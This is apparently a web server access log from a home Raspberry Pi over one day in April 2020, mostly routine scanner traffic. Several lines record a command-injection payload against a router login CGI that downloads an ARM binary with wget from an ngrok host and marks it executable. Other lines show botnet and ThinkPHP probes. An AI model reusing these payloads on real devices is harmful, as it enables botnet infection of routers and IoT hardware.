Fri Apr 10 06:25:07 MDT 2020
 06:25:07 up 45 days, 10:53,  1 user,  load average: 0.41, 0.28, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 45days 43:37   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE
13.65.201.223 - - [10/Apr/2020:12:26:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
187.190.246.249 - - [10/Apr/2020:12:31:32 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
187.190.246.249 - - [10/Apr/2020:12:31:32 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
109.94.113.155 - - [10/Apr/2020:12:50:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
85.197.33.161 - - [10/Apr/2020:13:20:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
51.68.201.115 - - [10/Apr/2020:13:31:31 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
141.98.81.6 - - [10/Apr/2020:13:34:59 +0000] "UNKNOWN  HTTP/1.1" 400 0 "" ""
190.122.17.141 - - [10/Apr/2020:13:42:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.153.199.118 - - [10/Apr/2020:13:55:35 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
208.91.109.18 - - [10/Apr/2020:14:07:06 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [10/Apr/2020:14:07:06 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
109.233.18.202 - - [10/Apr/2020:14:30:00 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
171.67.70.85 - - [10/Apr/2020:14:58:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
122.176.27.136 - - [10/Apr/2020:15:13:19 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
122.176.27.136 - - [10/Apr/2020:15:13:19 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
91.234.62.19 - - [10/Apr/2020:16:47:25 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" ""
159.89.16.121 - - [10/Apr/2020:17:09:14 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
94.65.246.112 - - [10/Apr/2020:17:09:37 +0000] "GET / HTTP/1.1" 400 0 "" ""
146.185.142.70 - - [10/Apr/2020:17:10:25 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.50.241.251 - - [10/Apr/2020:19:08:49 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
2.50.241.251 - - [10/Apr/2020:19:08:49 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
172.105.231.199 - - [10/Apr/2020:19:51:06 +0000] "GET / HTTP/1.1" 400 0 "" ""
208.91.109.18 - - [10/Apr/2020:20:01:28 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [10/Apr/2020:20:01:28 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
185.153.199.118 - - [10/Apr/2020:20:30:57 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
125.88.181.108 - - [10/Apr/2020:21:34:11 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
179.106.106.187 - - [10/Apr/2020:21:34:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.182.139.74 - - [10/Apr/2020:22:12:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.243.132.27 - - [10/Apr/2020:22:43:24 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
201.111.179.237 - - [10/Apr/2020:22:43:45 +0000] "GET / HTTP/1.1" 400 0 "" ""
73.138.44.49 - - [10/Apr/2020:22:58:51 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
73.138.44.49 - - [10/Apr/2020:22:58:51 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
27.155.87.180 - - [10/Apr/2020:23:19:30 +0000] "GET / HTTP/1.1" 200 25000 "" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705"
27.155.87.180 - - [10/Apr/2020:23:19:31 +0000] "GET /index.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
80.44.199.235 - - [10/Apr/2020:23:29:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
202.40.191.115 - - [10/Apr/2020:23:34:15 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
202.40.191.115 - - [10/Apr/2020:23:34:18 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:19 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:19 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:20 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:21 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:21 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:22 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:22 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
202.40.191.115 - - [10/Apr/2020:23:34:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
71.6.199.23 - - [10/Apr/2020:23:41:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.199.23 - - [10/Apr/2020:23:41:24 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" ""
71.6.199.23 - - [10/Apr/2020:23:41:24 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" ""
71.6.199.23 - - [10/Apr/2020:23:41:24 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" ""
71.6.199.23 - - [10/Apr/2020:23:41:24 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.19.1"
95.152.63.252 - - [11/Apr/2020:00:36:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
85.93.20.170 - - [11/Apr/2020:00:42:31 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
114.37.176.116 - - [11/Apr/2020:00:56:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.62.174.128 - - [11/Apr/2020:02:35:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.153.199.118 - - [11/Apr/2020:04:13:33 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
212.83.171.224 - - [11/Apr/2020:04:15:33 +0000] "GET / HTTP/1.1" 200 25000 "" ""
179.52.65.152 - - [11/Apr/2020:04:31:37 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
179.52.65.152 - - [11/Apr/2020:04:31:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
35.233.105.134 - - [11/Apr/2020:04:53:05 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
83.110.229.36 - - [11/Apr/2020:06:45:48 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
35.205.86.202 - - [11/Apr/2020:07:01:19 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
35.233.105.134 - - [11/Apr/2020:07:04:18 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
203.45.127.125 - - [11/Apr/2020:07:25:15 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
203.45.127.125 - - [11/Apr/2020:07:25:15 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
45.178.19.236 - - [11/Apr/2020:07:57:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
51.68.70.66 - - [11/Apr/2020:08:59:04 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
61.219.11.153 - - [11/Apr/2020:09:01:33 +0000] "GET / HTTP/1.1" 400 0 "" ""
189.46.154.72 - - [11/Apr/2020:10:09:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.243.130.196 - - [11/Apr/2020:10:56:53 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
35.233.105.134 - - [11/Apr/2020:12:19:26 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
223.152.76.157 - - [11/Apr/2020:12:24:48 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" ""
Sat Apr 11 06:25:05 MDT 2020
 06:25:06 up 46 days, 10:53,  1 user,  load average: 0.39, 0.27, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 46days 55:45   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE